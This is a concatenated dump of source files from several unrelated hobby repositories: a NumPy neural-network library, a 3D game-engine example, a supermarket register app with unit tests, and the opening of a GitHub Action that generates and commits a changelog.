elif initializer.lower() in ("relu"):
return relu
elif initializer.lower() in ("relu_uniform"):
return relu_uniform
else:
print("'%s' is not currently an available initializer function. Has been set to 'uniform' by default" % initializer)
return uniform
else:
return initializer
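# A minimal usage sketch: get() accepts either a name or a callable, so both lines
# below produce a (128, 784) array (the shape here is illustrative only).
#
#   w1 = get("xavier")((128, 784))
#   w2 = get(lambda shape: np.zeros(shape))((128, 784))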
```
#### File: dlmb/layers/base_layer.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
import optimizers as op
class Base_Layer(metaclass=ABCMeta):
@abstractmethod
def __init__(self, name:str, **kwargs) -> None:
"""
The Base_Layer class is an abstract class for all neural-net layers.
All neural-net layers must inherit from Base_layer.
"""
self.name = name
@abstractmethod
def build(self) -> None:
"""
Sets all of the vars that will be used in the layer.
"""
pass
@abstractmethod
def get_summary(self, with_vars:bool) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
            summary : dict : A dictionary of the layer's features.
"""
return summary
@abstractmethod
def load(self, layer_data:dict) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
            layer_data : dict : A dictionary of saved vars from when this layer was first built and then saved.
"""
pass
@abstractmethod
def map_data(self, data:np.ndarray) -> np.ndarray:
"""
Maps the data from the previous layer to an output.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
return output
@abstractmethod
def calculate_gradients(self, error:np.ndarray) -> np.ndarray:
"""
Calculates the derivatives of the error from the previous layer W.R.T each trainable var in this layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
return layer_error
@abstractmethod
def update_vars(self, optimizer:op.Base_Optimizer, epoch:int) -> None:
"""
Updates all the trainable vars with the previously calculated gradients.
Arguments:
optimizer : Base_Optimizer : The optimization function the user wants to use.
epoch : int : The current epoch or time step the model is at.
"""
pass
```
#### File: dlmb/layers/conv.py
```python
from layers.base_layer import *
from utils import *
import activations as a
import initializers as i
class Conv(Base_Layer):
@accepts(self="any", output_size=int, input_shape=tuple, activation=(a.Base_Activation, str),
bias_type=str, trainable=bool, filter_size=(tuple,int), stride=(tuple,int), padding=int,
weight_initializer=str, bias_initializer=str)
def __init__(self, output_size, input_shape, activation="relu", bias_type="per_node",
trainable=True, filter_size=(1,1), stride=(1,1), padding=0,
weight_initializer="random", bias_initializer="random") -> None:
"""
The conv layer or convolutional layer creates a numpy array that is convolved or cross-correlated over some data.
The conv layer also makes use of shared variables, meaning that compared to a dense layer there will be less variables.
Arguments:
output_size : int : An int of the output size, (E.X output_size=6 returns a numpy array of size
- [batch_size, ..., 6] "an image with 6 channels").
input_shape : tuple : A tuple of the input shape, (E.X input_shape=(28, 28, 1) which in this example is a 28*28 image with 1 channel).
activation : Base_Activation/str : A mathematical function that generally applies a non-linear mapping to some data.
bias_type : str : Has three settings, per_node (a bias with weights for every output),
- single (one bias weight for all outputs), none (no bias is used).
trainable : bool : If True, the vars in this layer will update based on the calculated loss of this layer W.R.T the vars.
filter_size : tuple/int : A tuple of 2 values or a int specifying the height and width of each segment of data that will be convolved over.
stride : tuple/int : A tuple or int of values specifying the stride for the height and width when convolving over some data.
padding : int : An int specifying the amount of padding to be added around the input data.
weight_initializer : str : An initializer function to set the values for the weights.
bias_initializer : st : An initializer function to set the values for the bias'.
"""
super().__init__("Conv")
        if len(input_shape) == 2:
            # Assume a channels-last layout (height, width, channels), which is what
            # the rest of this layer expects.
            input_shape = (input_shape[0], input_shape[1], 1)
if isinstance(filter_size, int):
filter_size = (filter_size, filter_size)
if isinstance(stride, int):
stride = (stride, stride)
self.built = False
self.layer_shape = (output_size, input_shape)
self.activation = a.get(activation)
self.bias_type = bias_type
self.trainable = trainable
self.filter_size = filter_size
self.stride = stride
self.padding = padding
self.weight_initializer = weight_initializer
self.bias_initializer = bias_initializer
self.weights = 0
self.bias = 0
self.optimizations = {"weight":[0,0], "bias":[0,0]}
self.cached_data = {}
        # Put this into its own function called get_output_size()
# calculates the output sizes for the layer.
height_output_size = int((self.layer_shape[1][0]-self.filter_size[0] + (2*self.padding))/self.stride[0]) + 1
width_output_size = int((self.layer_shape[1][1]-self.filter_size[1] + (2*self.padding))/self.stride[1]) + 1
self.output_shape = (height_output_size, width_output_size, output_size)
def build(self) -> None:
"""
Sets the values for all of the vars that will be used.
Also sets the layers activation function if the user sent through a string as the argument.
"""
if not self.built:
# Set self.weights.
init_shape = (self.output_shape[2], self.filter_size[0]*self.filter_size[1]*self.layer_shape[1][2])
weight_shape = (self.output_shape[2], self.filter_size[0]*self.filter_size[1], self.layer_shape[1][2])
            self.weights = i.get(self.weight_initializer)(init_shape).reshape(weight_shape)
# Set self.bias.
            self.bias = i.get(self.bias_initializer)((self.layer_shape[0], 1))
# Set self.bias based on self.bias_type.
if self.bias_type == "per_node":
self.bias = self.bias
elif self.bias_type == "single":
self.bias = self.bias[0]
elif self.bias_type == "none":
                self.bias = np.array([[0]])
            else:
                print("At Conv.build(): '%s' is not a valid bias_type. Has been set to 'per_node' by default" % self.bias_type)
self.built = True
@accepts(self="any", with_vars=bool)
def get_summary(self, with_vars) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
            summary : dict : A dictionary of the layer's features.
"""
summary = {
"name":self.name,
"built":self.built,
"layer_shape":self.layer_shape,
"activation":self.activation.name,
"bias_type":self.bias_type,
"trainable":self.trainable,
"filter_size":self.filter_size,
"stride":self.stride,
"padding":self.padding,
"output_size":self.output_size,
"weight_initializer":self.weight_initializer,
"bias_initializer":self.bias_initializer,
"num_trainable_vars":(self.weights.shape[0]*self.weights.shape[1])+self.bias.shape[0]
}
if with_vars:
summary["weights"] = np.asarray(self.weights)
summary["bias"] = np.asarray(self.bias)
summary["optimizations"] = {key:np.asarray(self.optimizations[key]).tolist() for key in self.optimizations}
return summary
@accepts(self="any", layer_data=dict)
def load(self, layer_data) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
            layer_data : dict : A dictionary of saved vars from when this layer was first built and then saved.
"""
self.name = layer_data["name"]
self.built = layer_data["built"]
self.layer_shape = (layer_data["layer_shape"][0], tuple(layer_data["layer_shape"][1]))
        self.activation = a.get(layer_data["activation"])
self.bias_type = layer_data["bias_type"]
self.trainable = layer_data["trainable"]
self.filter_size = layer_data["filter_size"]
self.stride = layer_data["stride"]
self.padding = layer_data["padding"]
self.output_size = layer_data["output_size"]
self.weight_initializer = layer_data["weight_initializer"]
self.bias_initializer = layer_data["bias_initializer"]
self.weights = np.asarray(layer_data["weights"])
self.bias = np.asarray(layer_data["bias"])
self.optimizations = {key:np.asarray(layer_data["optimizations"][key]) for key in layer_data["optimizations"]}
@accepts(self="any", data=np.ndarray)
def map_data(self, data) -> np.ndarray:
"""
Maps the data to an output by cross-correlating weights over the data.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
d_shape = data.shape
# Turn the data into an easier to use shape.
if len(d_shape) == 2:
data = np.expand_dims(np.expand_dims(data, axis=0), axis=3)
elif len(d_shape) == 4:
data = data
else:
raise ValueError("At Conv.map_data(): Data with shape %s can not be used. Please reshape the data to a 2dim or 4dim sized numpy array." % d_shape)
        # Store the current data and perform mathematical operations on it.
self.cached_data["data"] = data
# Make sure the shape of the data matches this layers input_shape.
if data.shape[1:] == self.layer_shape[1]:
# Create a new numpy array to hold the mapped data.
self.cached_data["mapped_data"] = np.zeros((data.shape[0], self.output_shape[0], self.output_shape[1], self.output_shape[2]))
for segment, height, width, _, _ in get_segments(data, self.filter_size[0], self.filter_size[1], self.stride):
segment = np.expand_dims(segment.reshape(*segment.shape[:1], -1, *segment.shape[-1:]), axis=1)
self.cached_data["mapped_data"][0:, height, width, 0:] += np.sum(segment*self.weights, axis=(2,3))+self.bias.T
return self.activation.map_data(self.cached_data["mapped_data"])
else:
raise ValueError("At Conv.map_data(): Data with shape %s does not match this layers specified input_shape of %s" % (d_shape[1:], self.layer_shape[1]))
@accepts(self="any", error=np.ndarray)
def calculate_gradients(self, error) -> np.ndarray:
"""
Calculates the gradients of the error W.R.T each trainable var in the layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
error = error.reshape((error.shape[0], self.output_shape[0], self.output_shape[1], self.output_shape[2]))
dO_dZ = self.activation.calculate_gradients(self.cached_data["mapped_data"])
node_errors = error*dO_dZ.reshape(error.shape)
# Calculate the weight gradients
self.optimizations["weight"][0] = np.zeros(self.weights.shape)
for segment, height, width, _, _ in get_segments(self.cached_data["data"], self.filter_size[0], self.filter_size[1], self.stride):
# Sort out the shapes so they can be broadcast together.
segment = np.expand_dims(segment, axis=1)
error_segment = np.expand_dims(node_errors[0:, height:height+1, width:width+1], axis=4).transpose(0,3,1,2,4)
segment = segment.reshape(*segment.shape[:2], -1, *segment.shape[-1:])
error_segment = error_segment.reshape(*error_segment.shape[:2], -1, *error_segment.shape[-1:])
self.optimizations["weight"][0] += np.mean(error_segment*segment, axis=0)
# Calculate the bias gradients based on self.bias_type.
if self.bias_type == "per_node":
self.optimizations["bias"][0] = np.mean(np.sum(node_errors, axis=(1,2)), axis=0, keepdims=True).T
elif self.bias_type == "single":
self.optimizations["bias"][0] = np.mean(np.sum(node_errors, axis=(1,2,3)))
else:
self.optimizations["bias"][0] = np.array([[0.0]])
# Return this layer's error for the next layer to use.
dE_dI = np.zeros(self.cached_data["data"].shape)
# Sort out the shapes so they can be broadcast together.
weights = np.expand_dims(self.weights.reshape(self.output_shape[2], self.filter_size[0], self.filter_size[1], self.layer_shape[1][2]), axis=0)
error_segments = np.expand_dims(node_errors, axis=1).transpose(0, 4, 2, 3, 1)
for _, height, width, i, j in get_segments(self.cached_data["data"], self.filter_size[0], self.filter_size[1], self.stride):
error_segment = error_segments[0:, 0:, height:height+1, width:width+1, 0:]
dE_dI[0:, i:i+self.filter_size[0], j:j+self.filter_size[1], 0:] += np.sum(error_segment*weights, axis=1)
return dE_dI
@accepts(self="any", optimizer=op.Base_Optimizer, epoch=int)
def update_vars(self, optimizer, epoch) -> None:
"""
Updates the trainable vars in the layer with the correct gradients.
Arguments:
optimizer : base_optimizer : An optimizer class that takes each layer's gradients and optimizes them to reach a local optima in the error faster.
epoch : int : The current epoch that the layer is training on.
"""
if self.trainable:
self.optimizations["weight"] = optimizer.map_data(self.optimizations["weight"], epoch)
self.optimizations["bias"] = optimizer.map_data(self.optimizations["bias"], epoch)
self.weights -= self.optimizations["weight"][0]
self.bias -= self.optimizations["bias"][0]
```
#### File: dlmb/layers/dropout.py
```python
from layers.base_layer import *
from utils.function_helpers import *
class Dropout(Base_Layer):
@accepts(self="any", keep_prob=float)
def __init__(self, keep_prob=0.5) -> None:
"""
Dropout is a type of regularization that creates a mask or probabilities.
This mask will then be applied to any incoming input,
in effect cancelling a certain percentage of the input.
Arguments:
keep_prob : float : The probability that each feature along each row of the input will be kept.
"""
super().__init__("Dropout")
self.keep_prob = keep_prob
self.built = False
def build(self) -> None:
self.built = True
@accepts(self="any", with_vars=bool)
def get_summary(self, with_vars) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
            summary : dict : A dictionary of the layer's features.
"""
summary = {
"name":self.name,
"built":self.built,
"keep_prob":self.keep_prob
}
return summary
@accepts(self="any", layer_data=dict)
def load(self, layer_data) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
            layer_data : dict : A dictionary of saved vars from when this layer was first built and then saved.
"""
self.name = layer_data["name"]
self.built = layer_data["built"]
self.keep_prob = layer_data["keep_prob"]
@accepts(self="any", data=np.ndarray)
def map_data(self, data) -> np.ndarray:
"""
        Applies a mask to some data in the form of (x * ([...] < keep_prob)) / keep_prob.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
data_shape = data.shape
# Try to write a decorator for this.
# Makes sure that the data is a 2d np.ndarray.
if len(data.shape) == 1:
data = data.reshape((1, data.shape[0]))
elif len(data.shape) > 1:
length = 1
for i in range(len(data.shape)-1):
length *= data.shape[i+1]
data = data.reshape((data.shape[0], length))
self.mask = np.random.random(data.shape) < self.keep_prob
return np.reshape((data*self.mask)/self.keep_prob, data_shape)
@accepts(self="any", error=np.ndarray)
def calculate_gradients(self, error) -> np.ndarray:
"""
Calculates the gradients of the error W.R.T to the input of this layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
error_shape = error.shape
# Makes sure that the error is a 2d np.ndarray.
if len(error.shape) == 1:
error = error.reshape((1, error.shape[0]))
elif len(error.shape) > 1:
length = 1
for i in range(len(error.shape)-1):
length *= error.shape[i+1]
error = error.reshape((error.shape[0], length))
return np.reshape((error*self.mask)/self.keep_prob, error_shape)
@accepts(self="any", optimizer=op.Base_Optimizer, epoch=int)
def update_vars(self, optimizer, epoch) -> None:
pass
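# A small numeric sketch of the inverted-dropout scaling (illustrative values): with
# keep_prob = 0.5, an input [2.0, 4.0, 6.0, 8.0] and a sampled mask [1, 0, 1, 1],
# map_data() returns [4.0, 0.0, 12.0, 16.0] -- kept activations are divided by
# keep_prob so the layer's expected output is unchanged and no rescaling is needed
# at inference time.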
```
#### File: dlmb/dlmb/losses.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
from utils.function_helpers import *
class Base_Loss(metaclass=ABCMeta):
@abstractmethod
def __init__(self) -> None:
"""
The Base_Loss class is an abstract class for all loss functions.
All loss functions must inherit from Base_Loss.
"""
pass
@abstractmethod
def map_data(self, y_true:np.ndarray, y_pred:np.ndarray) -> np.ndarray:
"""
map_data() takes some data and applies a mathematical mapping to it.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Return:
output : np.ndarray : An n dimensional numpy array of the mapped data.
"""
return output
@abstractmethod
def calculate_gradients(self, y_true:np.ndarray, y_pred:np.ndarray) -> np.ndarray:
"""
calculate_gradients returns the derivative of the loss function W.R.T the data.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Return:
output : np.ndarray : An n dimensional numpy array of gradients.
"""
return output
class Mean_Squared_Error(Base_Loss):
def __init__(self) -> None:
"""
The MSE class is a commonly used regression loss function.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the squared distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the mean squared distance between y_true and y_pred.
"""
return (y_pred-y_true)**2/2
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def calculate_gradients(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return y_pred - y_true
class Binary_Crossentropy(Base_Loss):
def __init__(self) -> None:
"""
The Binary_crossentropy class measures the performance of a classification model whose output is a probability value between 0 and 1,
and where the number of outputs is less than 3.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
            output : np.ndarray : The binary cross-entropy between y_true and y_pred.
"""
part1 = y_true*np.log(y_pred+1.0e-8) # I add 1.0e-8 to make sure 0 isn't going into np.log
part2 = (1-y_true)*np.log(1-y_pred+1.0e-8)
return -(part1 + part2)
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def calculate_gradients(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return division_check(y_true,y_pred) - division_check(1-y_true, 1-y_pred)
class Crossentropy(Base_Loss):
def __init__(self) -> None:
"""
The Crossentropy class measures the performance of a classification model whose output is a probability value between 0 and 1,
and where the number of outputs is more than 2.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
            output : np.ndarray : The cross-entropy between y_true and y_pred.
"""
return -(y_true*np.log(y_pred+1.0e-8))
    def calculate_gradients(self, y_true:np.ndarray, y_pred:np.ndarray) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return division_check(y_true, y_pred)
def get(loss) -> Base_Loss:
"""
Finds and returns the correct loss function.
Arguments:
loss : Base_Loss/str : The loss function the user wants to use.
Returns:
loss : Base_Loss : The correct loss function.
"""
if isinstance(loss, str):
if loss.lower() in ("mse", "mean_squared_error"):
return Mean_Squared_Error()
elif loss.lower() in ("bc", "bce", "binary_crossentropy"):
return Binary_Crossentropy()
elif loss.lower() in ("ce", "crossentropy"):
return Crossentropy()
else:
print("At losses.get(): '%s' is not an available loss function. Has been set to 'Mean_squared_error' by default" % loss)
            return Mean_Squared_Error()
elif isinstance(loss, Base_Loss):
return loss
else:
raise ValueError("At losses.get(): Expected 'class inheriting from Base_Loss' or 'str' for the argument 'loss', recieved '%s'" % type(loss))
``` |
{
"source": "Jonathan-Andrews/pyGE-Python-Game-Engine",
"score": 3
} |
#### File: pyGE-Python-Game-Engine/pyge/example.py
```python
import random
from window import Window
from gameObjects.object2d import Object2D
from gameObjects.object3d import Object3D
from gameObjects.primitives import *
class Game(Window):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.square = Object3D([
[-.5,-.5,-.5],
[.5,-.5,-.5],
[.5,.5,-.5],
[-.5,.5,-.5],
[-.5,-.5,.5],
[.5,-.5,.5],
[.5,.5,.5],
[-.5,.5,.5],
],
[
[0,1],
[1,2],
[2,3],
[3,0],
[4,5],
[5,6],
[6,7],
[7,4],
[0,4],
[1,5],
[2,6],
[3,7]
], draw_type='lines')
def on_run(self):
self.square.draw()
self.square.rotate_x(0.0078)
self.square.rotate_y(0.0078)
self.square.rotate_z(0.0078)
if __name__ == "__main__":
game = Game(400, 400, title='test')
game.run()
"""
TODO:
ADD USER INPUT.
ALLOW USER TO ADD COLOURS TO VERTICIES AND FACES AND STUFF.
"""
``` |
{
"source": "jonathanan/supermarket",
"score": 4
} |
#### File: jonathanan/supermarket/app.py
```python
import supermarket_register
import json
import os
def print_menu():
print('1. List products')
print('2. Add a product')
print('3. Remove a product')
print('4. Calculate total of products')
print('5. Save and exit')
if __name__ == '__main__':
# Read config and create Supermarket Register
product_file = open('config/products.json', 'r').read()
product_data = json.loads(product_file)
register = supermarket_register.SupermarketRegister(product_data)
while True:
print_menu()
print('Select option:')
option = int(input())
try:
if(option == 1):
register.list_products()
elif(option == 2):
print('Enter product code:')
code = str(input())
print('Enter product name:')
name = str(input())
print('Enter product price:')
price = str(input())
product = { code: { 'product': name, 'price': price } }
register.add_product(product)
elif(option == 3):
print('Enter product code:')
code = str(input())
register.remove_product(code)
elif(option == 4):
print('Enter product codes (separated by semicolons):')
os.environ['SKUS'] = str(input())
print('$', register.total_cost(os.environ['SKUS']))
elif(option == 5):
with open('config/products.json', 'w') as config:
json.dump(register.product_codes, config)
break
else:
print('Invalid option')
except KeyError:
print('Invalid input')
except ValueError:
print('Invalid input')
print()
```
#### File: jonathanan/supermarket/test_supermarket_register.py
```python
import supermarket_register
import unittest
class TestSupermarketRegister(unittest.TestCase):
"""
Test the SupermarketRegister class.
"""
def _mock_supermarket_instance(self):
"""
Test helper function for mocking a basic SupermarketRegister instance.
"""
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': 1
}
}
return supermarket_register.SupermarketRegister(product_codes)
def test_init(self):
"""
Test initializing an instance of SupermarketRegister.
"""
# Test simple initialization
sm = self._mock_supermarket_instance()
self.assertIs(type(sm),supermarket_register.SupermarketRegister)
# Test invalid product code initialization
product_codes = {
'XXXX-XXXX-XXXX-XXX*': {
'product': 'a',
'price': 1
}
}
with self.assertRaises(ValueError):
supermarket_register.SupermarketRegister(product_codes)
# Test invalid price initialization
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': -1
}
}
with self.assertRaises(ValueError):
supermarket_register.SupermarketRegister(product_codes)
def test_add_product(self):
"""
Test that an input of a product will be added to the Supermarket
register.
"""
sm = self._mock_supermarket_instance()
product = {
'BBBB-BBBB-BBBB-BBBB': {
'product': 'b',
'price': 2
}
}
sm.add_product(product)
# Test product is added
self.assertEqual(
sm.product_codes['BBBB-BBBB-BBBB-BBBB'],
{ 'product': 'b', 'price': 2 }
)
# Test KeyError is raised if product already exists
with self.assertRaises(KeyError):
sm.add_product(product)
def test_remove_product(self):
"""
Test that an input of a product will be removed from the Supermarket
register.
"""
sm = self._mock_supermarket_instance()
product = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': 1
}
}
sm.remove_product('XXXX-XXXX-XXXX-XXXX')
# Test product is removed
self.assertTrue('XXXX-XXXX-XXXX-XXXX' not in sm.product_codes)
        # Test KeyError is raised if product does not exist.
with self.assertRaises(KeyError):
sm.remove_product('XXXX-XXXX-XXXX-XXXX')
def test_total_cost(self):
"""
Test that an input string of product codes separated by semicolons will
return the total price of all the products (including local sales tax).
"""
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'x',
'price': 1
},
'YYYY-YYYY-YYYY-YYYY': {
'product': 'y',
'price': 1.12
},
'ZZZZ-ZZZZ-ZZZZ-ZZZZ': {
'product': 'z',
'price': 2.345
},
'AAAA-AAAA-AAAA-AAAA': {
'product': 'a',
'price': '1'
}
}
sm = supermarket_register.SupermarketRegister(product_codes)
# Test single item
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx'),
round(1+(1*sm.local_sales_tax),2)
)
# Test different spacing in input string
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx;YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx; YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx; YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
# Test price greater than two decimal places
self.assertEqual(
sm.total_cost('zZzZ-zZzZ-zZzZ-zZzZ'),
round(2.345+ (2.345*sm.local_sales_tax),2)
)
# Test price equals string integer
self.assertEqual(
sm.total_cost('aaaa-aaaa-aaaa-aaaa'),
round(int(1)+(int(1)*sm.local_sales_tax),2)
)
def test__validate_product_price(self):
"""
Test that the SupermarketRegister helper function will raise an error
if product price is less than or equal to 0. Otherwise, it returns None.
"""
sm = self._mock_supermarket_instance()
        # Test valid price int
        self.assertIsNone(sm._validate_product_price(1))
        # Test valid price float
self.assertIsNone(sm._validate_product_price(1.1))
# Test invalid price 0
with self.assertRaises(ValueError):
sm._validate_product_price(0)
# Test invalid price < 0
with self.assertRaises(ValueError):
sm._validate_product_price(-1)
def test__validate_product_codes_pattern(self):
"""
Test that the SupermarketRegister helper function will raise an error
if product code pattern does match the following specifications:
- sixteen characters long, with dashes separating each four-character
group
- is alphanumeric
- case insensitive
Otherwise, it returns None
"""
sm = self._mock_supermarket_instance()
# Test valid product code pattern lowercase
self.assertIsNone(
sm._validate_product_code_pattern('abcd-1234-abcd-1234')
)
# Test valid product code pattern uppercase
self.assertIsNone(
sm._validate_product_code_pattern('ABCD-1234-ABCD-1234')
)
# Test valid product code pattern mixcase
self.assertIsNone(
sm._validate_product_code_pattern('A123-b123-C123-d123')
)
# Test invalid lowercase 3 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('aaaa-bbbb-cccc-123')
# Test invalid uppercase 3 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAAA-BBBB-CCCC-123')
# Test invalid lowercase 5 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('aaaa-bbbb-cccc-12345')
# Test invalid uppercase 5 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAAA-BBBB-CCCC-12345')
# Test invalid character
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAA*-BBBB-CCCC-1234')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JonathanAquino/changelog-pr",
"score": 3
} |
#### File: JonathanAquino/changelog-pr/changelog-pr.py
```python
from datetime import datetime, timedelta
import json
import os
import re
import subprocess
from functools import cached_property
import requests
import yaml
class ChangelogCIBase:
"""Base Class for Changelog PR"""
github_api_url = 'https://api.github.com'
def __init__(
self,
repository,
event_path,
config,
current_branch,
filename='CHANGELOG.md',
token=None
):
self.repository = repository
self.filename = filename
self.config = config
self.current_branch = current_branch
self.token = token
@cached_property
def _get_request_headers(self):
"""Get headers for GitHub API request"""
headers = {
'Accept': 'application/vnd.github.v3+json'
}
# if the user adds `GITHUB_TOKEN` add it to API Request
# required for `private` repositories
if self.token:
headers.update({
'authorization': 'Bearer {token}'.format(token=self.token)
})
return headers
    def changelog_generation(self):
return NotImplemented
def parse_changelog(self, changes):
return NotImplemented
def _get_file_mode(self):
"""Gets the mode that the changelog file should be opened in"""
if os.path.exists(self.filename):
# if the changelog file exists
# opens it in read-write mode
file_mode = 'r+'
else:
            # if the changelog file does not exist
# opens it in read-write mode
# but creates the file first also
file_mode = 'w+'
return file_mode
def _get_last_generated_on(self):
"""Returns the date that the changelog was last generated"""
if not os.path.exists(self.filename):
return ''
with open(self.filename, 'r') as f:
changelog = f.read()
matches = re.search('Last generated on: (.*)', changelog)
if not matches:
return ''
return matches.group(1)
def _commit_changelog(self, string_data):
"""Write changelog to the changelog file"""
file_mode = self._get_file_mode()
last_generated_on = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
header = 'This is an automatically generated changelog by JonathanAquino/changelog-pr.\n'
header += 'Ensure that your PRs have one or more of the following labels:\n'
header += '{labels}.\n'.format(labels=', '.join(self.config.pr_labels))
header += 'Last generated on: {last_generated_on}\n\n'.format(last_generated_on=last_generated_on)
do_not_modify_line = '--- DO NOT MODIFY THIS HEADER ---\n\n'
header += do_not_modify_line
with open(self.filename, file_mode) as f:
# read the existing data and store it in a variable
body = f.read()
# write at the top of the file
f.seek(0, 0)
f.write(header)
f.write(string_data)
if body:
parts = body.split(do_not_modify_line)
if len(parts) == 1:
# Header wasn't present (old changelog)
remainder = parts[0]
else:
# Header is present
remainder = parts[1]
f.write(remainder)
# TODO: Remove this debug logging
subprocess.run(['ssh', '-T', '[email protected]'])
subprocess.run(['git', 'add', self.filename])
# [skip ci] instructs Buildkite to ignore the commit and not create a build.
subprocess.run(
['git', 'commit', '-m', '(Changelog PR) Added Changelog', '-m', '[skip ci]']
)
subprocess.run(
['git', 'push', '-u', 'origin', self.current_branch]
)
def run(self):
"""Entrypoint to the Changelog PR"""
changes = self.changelog_generation()
# exit the method if there is no changes found
if not changes:
return
string_data = self.parse_changelog(changes)
print_message('Commit Changelog', message_type='group')
self._commit_changelog(string_data)
print_message('', message_type='endgroup')
class ChangelogCIPullRequest(ChangelogCIBase):
"""Generates and commits changelog using pull requests"""
def _get_changelog_line(self, item):
"""Generate each PR block of the changelog"""
if self.config.skip_changelog_label in item['labels']:
print_message('Skipping changelog for #{number}'.format(number=item['number']))
return ''
if self._get_pr_label_annotation(item):
pr_label_annotation = '[{pr_label_annotation}] '.format(pr_label_annotation=self._get_pr_label_annotation(item))
else:
pr_label_annotation = ''
title = item['title']
title = re.sub(self.config.pr_title_removal_regex, '', title, flags=re.IGNORECASE)
return "## [#{number}]({url}) ({merge_date})\n- {pr_label_annotation}{title}\n\n".format(
number=item['number'],
url=item['url'],
title=title,
merge_date=item['merged_at'][0:10],
pr_label_annotation=pr_label_annotation
)
def _get_pr_label_annotation(self, pull_request):
"""
Returns a string to put in the annotation in square brackets before the PR title.
"""
pr_labels = self.config.pr_labels
